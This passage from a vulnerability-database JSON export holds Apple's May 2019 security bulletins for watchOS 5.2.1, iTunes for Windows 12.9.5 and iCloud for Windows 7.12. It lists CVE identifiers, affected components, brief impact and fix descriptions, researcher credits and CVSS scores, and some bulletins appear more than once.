5.2.1\n\nReleased May 13, 2019\n\n**AppleFileConduit**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2019-8593: Dany Lisiansky (@DanyL931)\n\n**CoreAudio**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing a maliciously crafted movie file may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2019-8585: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative\n\n**CoreAudio**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved error handling.\n\nCVE-2019-8592: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative\n\nEntry added August 1, 2019\n\n**Disk Images**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2019-8560: Nikita Pupyshev of Bauman Moscow State Technological University\n\nEntry updated May 30, 2019\n\n**Kernel**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A malicious application may be able to execute arbitrary code with system privileges\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2019-8605: Ned Williamson working with Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2019-8576: Brandon Azad of Google Project Zero, Junho Jang and Hanul Choi of LINE Security Team\n\nEntry updated May 30, 2019\n\n**Kernel**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: An application may be able to cause unexpected system termination or write kernel memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2019-8591: Ned Williamson working with Google Project Zero\n\n**Mail**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing a maliciously crafted message may lead to a denial of service\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8626: Natalie Silvanovich of Google Project Zero\n\n**Mail Message Framework**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2019-8613: Natalie Silvanovich of Google Project Zero\n\n**Messages**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing a maliciously crafted message may lead to a denial of service\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8664: Natalie Silvanovich of Google Project Zero\n\nEntry added August 1, 2019\n\n**Messages**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A remote attacker may be able to cause a system denial of service\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8573: Natalie Silvanovich of Google Project Zero\n\nEntry added July 3, 2019\n\n**Messages**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing a maliciously crafted message may lead to a denial of service\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8664: Natalie Silvanovich of Google Project Zero\n\nEntry added July 3, 2019\n\n**MobileInstallation**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A local user may be able to modify protected parts of the file system\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.\n\nCVE-2019-8568: Dany Lisiansky (@DanyL931)\n\n**MobileLockdown**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A malicious application may be able to gain root privileges\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8637: Dany Lisiansky (@DanyL931)\n\n**SQLite**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: An input validation issue was addressed with improved memory handling.\n\nCVE-2019-8577: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A maliciously crafted SQL query may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2019-8600: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A malicious application may be able to read restricted memory\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8598: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A memory corruption issue was addressed by removing the vulnerable code.\n\nCVE-2019-8602: Omer Gull of Checkpoint Research\n\n**sysdiagnose**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2019-8574: Dayton Pidhirney (@_watbulb) of Seekintoo (@seekintoo)\n\nEntry updated February 3, 2020\n\n**WebKit**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2019-8607: Junho Jang and Hanul Choi of LINE Security Team\n\n**WebKit**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2019-8583: sakura of Tencent Xuanwu Lab, jessica (@babyjess1ca_) of Tencent Keen Lab, and dwfault working at ADLab of Venustech\n\nCVE-2019-8601: Fluoroacetate working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8622: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8623: Samuel Gro\u00df of Google Project Zero\n\n**Wi-Fi**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: An attacker in a privileged network position can modify driver state\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2019-8612: Milan Stute of Secure Mobile Networking Lab at Technische Universit\u00e4t Darmstadt\n\nEntry added May 30, 2019\n\n**Wi-Fi**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A device may be passively tracked by its Wi-Fi MAC address\n\nDescription: A user privacy issue was addressed by removing the broadcast MAC address.\n\nCVE-2019-8620: David Kreitschmann and Milan Stute of Secure Mobile Networking Lab at Technische Universit\u00e4t Darmstadt\n\n\n\n## Additional recognition\n\n**Clang**\n\nWe would like to acknowledge Brandon Azad of Google Project Zero for their assistance.\n\n**CoreAudio**\n\nWe would like to acknowledge riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative for their assistance.\n\nEntry added July 25, 2019\n\n**CoreFoundation**\n\nWe would like to acknowledge Vozzie and Rami and m4bln, Xiangqian Zhang, Huiming Liu of Tencent's Xuanwu Lab for their assistance.\n\n**Kernel**\n\nWe would like to acknowledge Brandon Azad of Google Project Zero and an anonymous researcher for their assistance.\n\n**MediaLibrary**\n\nWe would like to acknowledge Angel Ramirez and Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc. for their assistance.\n\n**MobileInstallation**\n\nWe would like to acknowledge Yi\u011fit Can YILMAZ (@yilmazcanyigit) for their assistance.\n", "edition": 4, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-27T08:19:16", "title": "About the security content of watchOS 5.2.1 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8568", "CVE-2019-8593", "CVE-2019-8577", "CVE-2019-8612", "CVE-2019-8592", "CVE-2019-8591", "CVE-2019-8602", "CVE-2019-8637", "CVE-2019-8560", "CVE-2019-8585", "CVE-2019-8622", "CVE-2019-8601", "CVE-2019-8620", "CVE-2019-8607", "CVE-2019-8605", "CVE-2019-8583", "CVE-2019-8626", "CVE-2019-8573", "CVE-2019-8598", "CVE-2019-8600", "CVE-2019-8574", "CVE-2019-8623", "CVE-2019-8613", "CVE-2019-8576", "CVE-2019-8664"], "modified": "2020-07-27T08:19:16", "id": "APPLE:HT210122", "href": "https://support.apple.com/kb/HT210122", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:44:07", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## iTunes for Windows 12.9.5\n\nReleased May 28, 2019\n\n**CoreText**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2019-8582: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative\n\nEntry added September 12, 2019\n\n**SQLite**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: An input validation issue was addressed with improved memory handling.\n\nCVE-2019-8577: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: Windows 7 and later\n\nImpact: A maliciously crafted SQL query may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2019-8600: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: Windows 7 and later\n\nImpact: A malicious application may be able to read restricted memory\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8598: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: Windows 7 and later\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A memory corruption issue was addressed by removing the vulnerable code.\n\nCVE-2019-8602: Omer Gull of Checkpoint Research\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2019-8607: Junho Jang and Hanul Choi of LINE Security Team\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2019-6237: G. Geshev working with Trend Micro Zero Day Initiative, Liu Long of Qihoo 360 Vulcan Team\n\nCVE-2019-8571: 01 working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8583: sakura of Tencent Xuanwu Lab, jessica (@babyjess1ca_) of Tencent Keen Lab, and dwfault working at ADLab of Venustech\n\nCVE-2019-8584: G. Geshev of MWR Labs working with Trend Micro Zero Day Initiative\n\nCVE-2019-8586: an anonymous researcher\n\nCVE-2019-8587: G. Geshev working with Trend Micro Zero Day Initiative\n\nCVE-2019-8594: Suyoung Lee and Sooel Son of KAIST Web Security &amp; Privacy Lab and HyungSeok Han and Sang Kil Cha of KAIST SoftSec Lab\n\nCVE-2019-8595: G. Geshev from MWR Labs working with Trend Micro Zero Day Initiative\n\nCVE-2019-8596: Wen Xu of SSLab at Georgia Tech\n\nCVE-2019-8597: 01 working with Trend Micro Zero Day Initiative\n\nCVE-2019-8601: Fluoroacetate working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8608: G. Geshev working with Trend Micro Zero Day Initiative\n\nCVE-2019-8609: Wen Xu of SSLab, Georgia Tech\n\nCVE-2019-8610: Anonymous working with Trend Micro Zero Day Initiative\n\nCVE-2019-8611: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8615: G. Geshev from MWR Labs working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8619: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab\n\nCVE-2019-8622: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8623: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8628: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab\n", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-09-25T04:30:33", "title": "About the security content of iTunes for Windows 12.9.5 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8608", "CVE-2019-8610", "CVE-2019-8584", "CVE-2019-8577", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8602", "CVE-2019-8594", "CVE-2019-8622", "CVE-2019-8611", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-6237", "CVE-2019-8583", "CVE-2019-8596", "CVE-2019-8582", "CVE-2019-8619", "CVE-2019-8615", "CVE-2019-8571", "CVE-2019-8598", "CVE-2019-8600", "CVE-2019-8597", "CVE-2019-8628", "CVE-2019-8623", "CVE-2019-8609", "CVE-2019-8595"], "modified": "2019-09-25T04:30:33", "id": "APPLE:HT210124", "href": "https://support.apple.com/kb/HT210124", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-10T17:00:05", "description": "# About the security content of iCloud for Windows 7.12\n\nThis document describes the security content of iCloud for Windows 7.12.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## iCloud for Windows 7.12\n\nReleased May 28, 2019\n\n**CoreText**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2019-8582: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative\n\nEntry added September 11, 2019\n\n**SQLite**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: An input validation issue was addressed with improved memory handling.\n\nCVE-2019-8577: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: Windows 7 and later\n\nImpact: A maliciously crafted SQL query may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2019-8600: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: Windows 7 and later\n\nImpact: A malicious application may be able to read restricted memory\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8598: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: Windows 7 and later\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A memory corruption issue was addressed by removing the vulnerable code.\n\nCVE-2019-8602: Omer Gull of Checkpoint Research\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2019-8607: Junho Jang and Hanul Choi of LINE Security Team\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2019-6237: G. Geshev working with Trend Micro Zero Day Initiative, Liu Long of Qihoo 360 Vulcan Team\n\nCVE-2019-8571: 01 working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8583: sakura of Tencent Xuanwu Lab, jessica (@babyjess1ca_) of Tencent Keen Lab, and dwfault working at ADLab of Venustech\n\nCVE-2019-8584: G. Geshev of MWR Labs working with Trend Micro Zero Day Initiative\n\nCVE-2019-8586: an anonymous researcher\n\nCVE-2019-8587: G. Geshev working with Trend Micro Zero Day Initiative\n\nCVE-2019-8594: Suyoung Lee and Sooel Son of KAIST Web Security &amp; Privacy Lab and HyungSeok Han and Sang Kil Cha of KAIST SoftSec Lab\n\nCVE-2019-8595: G. Geshev from MWR Labs working with Trend Micro Zero Day Initiative\n\nCVE-2019-8596: Wen Xu of SSLab at Georgia Tech\n\nCVE-2019-8597: 01 working with Trend Micro Zero Day Initiative\n\nCVE-2019-8601: Fluoroacetate working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8608: G. Geshev working with Trend Micro Zero Day Initiative\n\nCVE-2019-8609: Wen Xu of SSLab, Georgia Tech\n\nCVE-2019-8610: Anonymous working with Trend Micro Zero Day Initiative\n\nCVE-2019-8611: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8615: G. Geshev from MWR Labs working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8619: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab\n\nCVE-2019-8622: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8623: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8628: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: September 11, 2019\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-05-28T00:00:00", "type": "apple", "title": "About the security content of iCloud for Windows 7.12", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-6237", "CVE-2019-8571", "CVE-2019-8577", "CVE-2019-8582", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8598", "CVE-2019-8600", "CVE-2019-8601", "CVE-2019-8602", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8628"], "modified": "2019-05-28T00:00:00", "id": "APPLE:76B82742C66B190465E1377BEA4E4838", "href": "https://support.apple.com/kb/HT210125", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-10T17:00:05", "description": "# About the security content of iTunes for Windows 12.9.5\n\nThis document describes the security content of iTunes for Windows 12.9.5.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## iTunes for Windows 12.9.5\n\nReleased May 28, 2019\n\n**CoreText**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2019-8582: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative\n\nEntry added September 12, 2019\n\n**SQLite**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: An input validation issue was addressed with improved memory handling.\n\nCVE-2019-8577: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: Windows 7 and later\n\nImpact: A maliciously crafted SQL query may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2019-8600: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: Windows 7 and later\n\nImpact: A malicious application may be able to read restricted memory\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8598: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: Windows 7 and later\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A memory corruption issue was addressed by removing the vulnerable code.\n\nCVE-2019-8602: Omer Gull of Checkpoint Research\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2019-8607: Junho Jang and Hanul Choi of LINE Security Team\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2019-6237: G. Geshev working with Trend Micro Zero Day Initiative, Liu Long of Qihoo 360 Vulcan Team\n\nCVE-2019-8571: 01 working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8583: sakura of Tencent Xuanwu Lab, jessica (@babyjess1ca_) of Tencent Keen Lab, and dwfault working at ADLab of Venustech\n\nCVE-2019-8584: G. Geshev of MWR Labs working with Trend Micro Zero Day Initiative\n\nCVE-2019-8586: an anonymous researcher\n\nCVE-2019-8587: G. Geshev working with Trend Micro Zero Day Initiative\n\nCVE-2019-8594: Suyoung Lee and Sooel Son of KAIST Web Security &amp; Privacy Lab and HyungSeok Han and Sang Kil Cha of KAIST SoftSec Lab\n\nCVE-2019-8595: G. Geshev from MWR Labs working with Trend Micro Zero Day Initiative\n\nCVE-2019-8596: Wen Xu of SSLab at Georgia Tech\n\nCVE-2019-8597: 01 working with Trend Micro Zero Day Initiative\n\nCVE-2019-8601: Fluoroacetate working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8608: G. Geshev working with Trend Micro Zero Day Initiative\n\nCVE-2019-8609: Wen Xu of SSLab, Georgia Tech\n\nCVE-2019-8610: Anonymous working with Trend Micro Zero Day Initiative\n\nCVE-2019-8611: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8615: G. Geshev from MWR Labs working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8619: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab\n\nCVE-2019-8622: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8623: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8628: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: September 25, 2019\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-05-28T00:00:00", "type": "apple", "title": "About the security content of iTunes for Windows 12.9.5", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-6237", "CVE-2019-8571", "CVE-2019-8577", "CVE-2019-8582", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8598", "CVE-2019-8600", "CVE-2019-8601", "CVE-2019-8602", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8628"], "modified": "2019-05-28T00:00:00", "id": "APPLE:58882F88115CDA41ED601C84EE09383E", "href": "https://support.apple.com/kb/HT210124", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T20:42:19", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## iCloud for Windows 7.12\n\nReleased May 28, 2019\n\n**CoreText**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2019-8582: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative\n\nEntry added September 11, 2019\n\n**SQLite**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: An input validation issue was addressed with improved memory handling.\n\nCVE-2019-8577: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: Windows 7 and later\n\nImpact: A maliciously crafted SQL query may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2019-8600: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: Windows 7 and later\n\nImpact: A malicious application may be able to read restricted memory\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8598: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: Windows 7 and later\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A memory corruption issue was addressed by removing the vulnerable code.\n\nCVE-2019-8602: Omer Gull of Checkpoint Research\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2019-8607: Junho Jang and Hanul Choi of LINE Security Team\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2019-6237: G. Geshev working with Trend Micro Zero Day Initiative, Liu Long of Qihoo 360 Vulcan Team\n\nCVE-2019-8571: 01 working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8583: sakura of Tencent Xuanwu Lab, jessica (@babyjess1ca_) of Tencent Keen Lab, and dwfault working at ADLab of Venustech\n\nCVE-2019-8584: G. Geshev of MWR Labs working with Trend Micro Zero Day Initiative\n\nCVE-2019-8586: an anonymous researcher\n\nCVE-2019-8587: G. Geshev working with Trend Micro Zero Day Initiative\n\nCVE-2019-8594: Suyoung Lee and Sooel Son of KAIST Web Security 